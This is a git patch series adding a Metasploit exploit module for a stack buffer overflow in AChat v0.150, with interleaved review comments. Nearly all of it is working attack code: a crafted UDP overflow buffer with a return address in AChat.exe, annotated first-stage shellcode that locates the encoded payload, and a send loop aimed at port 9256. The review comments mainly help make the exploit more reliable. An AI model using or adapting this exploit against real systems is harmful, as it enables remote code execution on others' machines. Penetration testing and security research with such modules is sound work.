From 64ab11c6ba3938d05f72cc8fea6c3287eb72268c Mon Sep 17 00:00:00 2001 From: Balazs Bucsay Date: Thu, 29 Jan 2015 23:20:31 +0100 Subject: [PATCH 1/7] Add Achat Beta v0.150 RCE for Win7/XPSP3 --- modules/exploits/windows/misc/achat_beta.rb | 101 ++++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 modules/exploits/windows/misc/achat_beta.rb diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb new file mode 100644 index 0000000000..d20f21bdc9 --- /dev/null +++ b/modules/exploits/windows/misc/achat_beta.rb 
@@ -0,0 +1,101 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Achat Beta v0.150 Buffer Overflow', + 'Description' => %q{ + This module exploits a SEH based unicode stack buffer overflow in Achat v0.150, + by sending a crafted message to the default harcoded port 9256. The message + overflows the stack and overwrites the SEH handler. The exploit is reliable, but + depends of timing. It has two distinct threads that are overflowing the stack in + the same time. Tested on Windows XP SP3 and Windows 7. + The overflow was found by Peter Kasza. + }, + 'Author' => + [ + 'Balazs Bucsay ', # Exploit, Metasploit module + 'Peter Kasza ' # Vulnerability discovery + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'http://sourceforge.net/projects/achat/files/AChat%20beta/AChat%20beta%207%20%28v0.150%29/'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Payload' => + { + 'Space' => 730, +# 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), + 'StackAdjustment' => -3500, + 'EncoderOptions' => + { + 'BufferRegister' => 'EAX', + } + + }, + 'Platform' => 'win', + 'Targets' => + [ + # Tested OK Windows XP SP3, Windows 7 + # Not working on Windows Server 2003 + [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ], #AChat.exe + ], + 'Privileged' => false, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 18 2014')) + + register_options( + [ + Opt::RPORT(9256), + ], self.class) + end + + def exploit + connect_udp + + firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" + encoder = framework.encoders.create('x86/unicode_mixed') + 
encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) + payloadencoded = encoder.encode(payload.raw, nil, nil, platform) + + sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" + sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) + sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset + sploit << "\x61\x40" # POPAD + INC EAX + + sploit << target.ret # AChat.exe p/p/r address + # adjusting the first thread's unicode payload, tricky asm-fu + sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" + sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread + sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX + sploit << payloadencoded + "A"*(1152-payloadencoded.length) # placing the payload + sploit << "\x00" + "A"*10 + "\x00" + + + i = 0 + while i < sploit.length do + if i > 172000 + sleep(1.0) + end + udp_sock.put(sploit[i..i+8192-1]) + i += 8192 + end + + disconnect_udp + end + +end From 9891026d309b1d738142b166e4289ceb5fe6665d Mon Sep 17 00:00:00 2001 From: Balazs Bucsay Date: Mon, 9 Feb 2015 22:33:41 +0100 Subject: [PATCH 2/7] sleep changed to Rex::sleep --- modules/exploits/windows/misc/achat_beta.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index d20f21bdc9..7a3ae5c309 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote i = 0 while i < sploit.length do if i > 172000 - sleep(1.0) + Rex::sleep(1.0) end udp_sock.put(sploit[i..i+8192-1]) i += 8192 From c7880ab4e15f08caed7d465ed49a0aa0133196a5 Mon Sep 17 00:00:00 2001 
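Review bot: `disconnect_udp` at the end of `exploit` only runs on the success path; if `udp_sock.put` raises part-way through the loop (by the visible constants the buffer is roughly 177 KB sent as 8192-byte datagrams), the socket is simply abandoned. Unless the Udp mixin's cleanup already closes it, wrap the send loop in `begin … ensure disconnect_udp end`. The `172000` threshold and `8192` chunk size are also bare magic numbers; a one-line comment on why the one-second sleep kicks in only for the final datagrams (presumably to let the two target threads catch up before the SEH-overwriting tail lands, as the description hints) would save the next maintainer from re-deriving it.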
From: Balazs Bucsay Date: Mon, 9 Feb 2015 23:21:38 +0100 Subject: [PATCH 3/7] hex strings related explanations --- modules/exploits/windows/misc/achat_beta.rb | 35 +++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index 7a3ae5c309..9ce82d1951 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -67,6 +67,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_udp + # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding + # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding + # 55 PUSH EBP # ebp holds a close pointer to the payload + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 58 POP EAX # mov eax, ebp + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 05 00140011 ADD EAX,11001400 # adjusting eax + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 50 PUSH EAX # eax points to the start of the shellcode + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 58 POP EAX # padding + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 59 POP ECX # padding + # 0039 ADD BYTE PTR DS:[ECX],BH # padding firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" encoder = framework.encoders.create('x86/unicode_mixed') encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) 
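Review bot: The opcode listing labels every `00xx 00` instruction as padding, but `ADD BYTE PTR [EBP],DL`, `ADD BYTE PTR [ESI],CH`, `ADD BYTE PTR [EBX],AL`, `ADD BYTE PTR [ECX],BH` and `SUB AL,[EAX]` all touch memory through a register, so they are harmless only while those registers point at accessible memory when the handler runs — presumably part of why the module is timing-sensitive. Add the caveat above `firststage`, e.g. `# the 00xx "padding" opcodes read/write through EBP/ESI/EBX/ECX/EAX; they only work while those registers point at accessible memory`. It is also worth stating that the listing shows the bytes after the server's unicode expansion (each byte followed by 0x00), since the string literal itself holds the pre-expansion bytes.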
@@ -78,7 +94,26 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address + # adjusting the first thread's unicode payload, tricky asm-fu + # the first seh exception jumps here, firststage variable will be executed + # by the second seh exception as well. It needs to be in sync with the second + # thread, so that is why we adjust eax/ebp to have a close pointer to the + # payload, then firststage variable will take the rest of the job. + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 55 PUSH EBP # ebp with close pointer to payload + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 58 POP EAX # put ebp to eax + # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding + # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place + # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more + # 05 00140011 ADD EAX,11001400 # more adjusting + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 50 PUSH EAX # saving eax + # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding + # 5D POP EBP # mov ebp, eax sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX From ac6879cfe165bc3ad8e8b719524200fa8014da60 Mon Sep 17 00:00:00 2001 From: Balazs Bucsay Date: Mon, 9 Feb 2015 23:36:35 +0100 Subject: [PATCH 4/7] proper payload encoding from now on --- modules/exploits/windows/misc/achat_beta.rb | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index 9ce82d1951..beb4d4d8f9 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb 
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Achat Beta v0.150 Buffer Overflow', + 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ This module exploits a SEH based unicode stack buffer overflow in Achat v0.150, by sending a crafted message to the default harcoded port 9256. The message @@ -38,9 +38,11 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Payload' => { + 'DisableNops' => true, 'Space' => 730, -# 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), + 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), 'StackAdjustment' => -3500, + 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX', @@ -84,9 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" - encoder = framework.encoders.create('x86/unicode_mixed') - encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) - payloadencoded = encoder.encode(payload.raw, nil, nil, platform) sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) @@ -117,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX - sploit << payloadencoded + "A"*(1152-payloadencoded.length) # placing the payload + sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload sploit << "\x00" + "A"*10 + "\x00" From 86f3bcad113e79128511907e8f836012f838644e Mon Sep 17 00:00:00 2001 
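Review bot: `'Space' => 730` and the `'A' * (1152 - payload.encoded.length)` padding in the last hunk are coupled but neither says so: the padding expression raises `ArgumentError` (negative argument) if an encoded payload ever exceeds 1152 bytes, and the only thing preventing that is the framework enforcing `Space` against the encoded size. Document the coupling where `Space` is set, e.g. `# must stay below the 1152-byte slot the encoded payload is padded into (see exploit)`. `'DisableNops' => true` also deserves a why-comment; presumably a NOP sled would not survive the target's unicode conversion, but that is inferred rather than shown here.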
From: jvazquez-r7 Date: Mon, 9 Feb 2015 17:33:05 -0600 Subject: [PATCH 5/7] Do minor cleanup --- modules/exploits/windows/misc/achat_beta.rb | 52 ++++++++++----------- 1 file changed, 24 insertions(+), 28 deletions(-) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index beb4d4d8f9..312dfedd08 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -15,17 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ - This module exploits a SEH based unicode stack buffer overflow in Achat v0.150, - by sending a crafted message to the default harcoded port 9256. The message - overflows the stack and overwrites the SEH handler. The exploit is reliable, but - depends of timing. It has two distinct threads that are overflowing the stack in - the same time. Tested on Windows XP SP3 and Windows 7. - The overflow was found by Peter Kasza. + This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By + sending a crafted message to the default port 9256 it's possible to overwrites the + SEH handler. Even when the exploit is reliable it depends of timing since there are + two threads overflowing the stack in the same time. This module has been tested on + Windows XP SP3 and Windows 7. }, 'Author' => [ - 'Balazs Bucsay ', # Exploit, Metasploit module - 'Peter Kasza ' # Vulnerability discovery + 'Peter Kasza ', # Vulnerability discovery + 'Balazs Bucsay ' # Exploit, Metasploit module ], 'License' => MSF_LICENSE, 'References' => 
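Review bot: The reworded description still carries grammar slips on the new side: `it's possible to overwrites the SEH handler` should read `it's possible to overwrite the SEH handler`, `Even when the exploit is reliable it depends of timing` should read `Although the exploit is reliable, it depends on timing`, and `in the same time` should be `at the same time`. This text is user-facing `info` output, so it is worth a final pass before merge.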
@@ -45,16 +44,15 @@ class Metasploit3 < Msf::Exploit::Remote 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { - 'BufferRegister' => 'EAX', + 'BufferRegister' => 'EAX' } - }, 'Platform' => 'win', 'Targets' => [ - # Tested OK Windows XP SP3, Windows 7 - # Not working on Windows Server 2003 - [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ], #AChat.exe + # Tested OK Windows XP SP3, Windows 7 + # Not working on Windows Server 2003 + [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe ], 'Privileged' => false, 'DefaultTarget' => 0, @@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - Opt::RPORT(9256), + Opt::RPORT(9256) ], self.class) end 
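Review bot: `{ 'Ret' => "\x2A\x46" }` with `#ppr from AChat.exe` leaves the reader to work out that the two bytes become the handler address 0x0046002A after the target's unicode expansion, and that the address is tied to one AChat.exe build with no version check in the module; spell it out on the target line, e.g. `# "\x2A\x46" expands to 0x0046002A, a pop/pop/ret inside AChat.exe (build-specific)`. The `Not working on Windows Server 2003` note would also be more useful if it said why, if that is known.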
@@ -85,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding - firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" + first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" - sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" - sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) - sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset + sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00" + sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46) + sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address # adjusting the first thread's unicode payload, tricky asm-fu - # the first seh exception jumps here, firststage variable will be executed + # the first seh exception jumps here, first_stage variable will be executed # by the second seh exception as well. It needs to be in sync with the second # thread, so that is why we adjust eax/ebp to have a close pointer to the - # payload, then firststage variable will take the rest of the job. + # payload, then first_stage variable will take the rest of the job. # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 55 PUSH EBP # ebp with close pointer to payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding 
@@ -113,22 +111,20 @@ class Metasploit3 < Msf::Exploit::Remote # 50 PUSH EAX # saving eax # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 5D POP EBP # mov ebp, eax - sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" + sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread - sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX - sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload - sploit << "\x00" + "A"*10 + "\x00" - + sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX + sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload + sploit << "\x00" + 'A' * 10 + "\x00" i = 0 while i < sploit.length do if i > 172000 Rex::sleep(1.0) end - udp_sock.put(sploit[i..i+8192-1]) - i += 8192 + sent = udp_sock.put(sploit[i..i + 8192 - 1]) + i += sent end - disconnect_udp end From eb0741d7a76096d7c2333538f7bf1ec0fa46313d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Feb 2015 17:39:18 -0600 Subject: [PATCH 6/7] Modify reference --- modules/exploits/windows/misc/achat_beta.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb index 312dfedd08..e74499e98e 100644 --- a/modules/exploits/windows/misc/achat_beta.rb +++ b/modules/exploits/windows/misc/achat_beta.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - ['URL', 'http://sourceforge.net/projects/achat/files/AChat%20beta/AChat%20beta%207%20%28v0.150%29/'], + ['CWE', '121'], ], 'DefaultOptions' => { From 6165d623ff149cf8a4571c94c73404d70a1bd649 Mon Sep 17 00:00:00 2001 
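Review bot: `i += sent` in the send loop has no guard for `sent` being `0` or `nil`; since the loop now advances only by what `udp_sock.put` reports, a put that sends nothing leaves `i` unchanged and the `while` spins forever, sleeping a second per iteration once past 172000. Add a guard right after the put, e.g. `fail_with(Failure::Unknown, 'UDP send returned no data') unless sent.to_i > 0`, or `break` out of the loop. On a connected UDP socket a datagram is normally sent whole or the call raises, so the partial-write handling this hunk introduces is mostly defensive, which is fine — the zero case is the one that actually bites.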
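Review bot: Replacing the SourceForge URL with `['CWE', '121']` removes the only pointer to the affected AChat beta 7 (v0.150) package, so a user can no longer locate the build the module was written against. Unless the URL was dropped on purpose, keep both entries: `['URL', 'http://sourceforge.net/projects/achat/files/AChat%20beta/AChat%20beta%207%20%28v0.150%29/'], ['CWE', '121']`.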
From: jvazquez-r7 Date: Mon, 9 Feb 2015 17:39:55 -0600 Subject: [PATCH 7/7] Change module filename --- modules/exploits/windows/misc/{achat_beta.rb => achat_bof.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/misc/{achat_beta.rb => achat_bof.rb} (100%) diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_bof.rb similarity index 100% rename from modules/exploits/windows/misc/achat_beta.rb rename to modules/exploits/windows/misc/achat_bof.rb